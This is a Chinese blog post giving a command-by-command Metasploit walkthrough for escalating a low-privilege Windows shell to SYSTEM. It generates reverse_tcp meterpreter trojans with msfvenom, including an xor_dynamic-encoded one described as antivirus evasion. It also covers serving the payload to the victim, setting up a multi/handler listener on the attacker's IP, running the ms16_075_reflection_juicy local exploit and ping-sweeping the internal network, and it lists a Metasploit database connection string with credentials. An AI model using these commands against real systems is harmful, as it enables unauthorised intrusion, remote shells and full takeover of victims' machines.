原创

metasploit freamwork进行shell提权

一、先生成木马 用于获取低权限的shell后上传上去执行的木马(这个木马不需要高权限即可执行,但是如果有杀毒的话需要做免杀)

方法1:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.106 LPORT=5566 -f exe -o test.exe

方法2:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.106 LPORT=9528 -e x64/xor_dynamic -i 15 -f exe>msf9528.exe

下载木马到目标机器(使用shell传输到受害机器即可)
python -m http.server 端口号 (python3)

一般来说需要先用低权限的cmd执行systeminfo 进行分析,看看需要使用哪个ms脚本。(windows机器经常会用到的ms16提权脚本windows/local/ms16_075_reflection_juicy)

二、可以使用local_exploit_suggester模块分析一下需要使用哪个ms脚本进行提权
直接执行:
search post/multi/recon/local_exploit_suggester
use post/multi/recon/local_exploit_suggester
set session 5
exploit

三、全过程流程
1、开启tcp监听
use exploit/multi/handler
payload windows/meterpreter/reverse_tcp
show options
set lport 9528
set lhost 192.168.8.106 gongjijiqi ip
exploit

2、开启攻击机器监听后 执行已经上传到受害机器的msf.exe文件 建立反弹tcp连接

3、连接建立后 运行 getuid 查看权限(不出意外的话是低权限)
4、切换到后台 background 并且记录session号码

5、找到对应的ms脚本后执行
use exploit/windows/local/ms16_075_reflection_juicy
查看配置 show options 并且根据配置信息的require项目进行set
设置会话id set session 5
执行渗透 exploit

6、反弹4444端口完成会话后 执行 getuid 发现已经获得System权限!

7、注意msf数据库连接信息命令:db_connect msf3:ddecddb7c9fbce19f59ef78e3a6719f4@127.0.0.1:5432/msf3

8、内网探测主机:
for /L %i in (i,1,254) DO @ping -w 1 -n 1 192.168.3.%i | findstr "TTL"

正文到此结束
该篇文章的评论功能已被站长关闭
本文目录